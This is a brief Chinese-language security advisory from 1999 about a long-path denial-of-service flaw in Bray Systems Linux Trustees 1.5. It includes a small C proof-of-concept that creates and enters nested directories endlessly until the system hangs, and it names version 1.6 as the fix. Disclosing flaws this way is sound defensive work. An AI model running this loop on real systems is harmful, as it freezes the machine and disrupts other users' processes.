Bray Systems 1.5 Linux Trustees 长文件名漏洞发布时间:1999-12-01 更新时间:1999-12-01 严重程度:中 威胁程度:本地拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Bray Systems Linux Trustees 1.5 FOR Linux kernel 2.2.14详细描述 Bray Systems Linux Trustees是LINUX下的管理用户权限的存取控制程序,当请求一个不正常的长文件和路径会导致应用程序挂起。其他进程也会响应受到影响,如果要重新使用正常的功能,用户必须重新启动机器。 测试代码 #include <stdio.h> #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <unistd.h> int main(void) { while(1) { if(mkdir("aaaa",0777)<0) { perror("mkdir"); exit(1); } if(chdir("aaaa")<0) { perror("chdir"); exit(1); } } return(0); } 解决方案 Bray Systems 已经发行released Linux Trustees 1.6 并修补了这个漏洞,大家可以到下面的网址去下载:http://www.braysystems.com/linux/trustees.html 相关信息 |
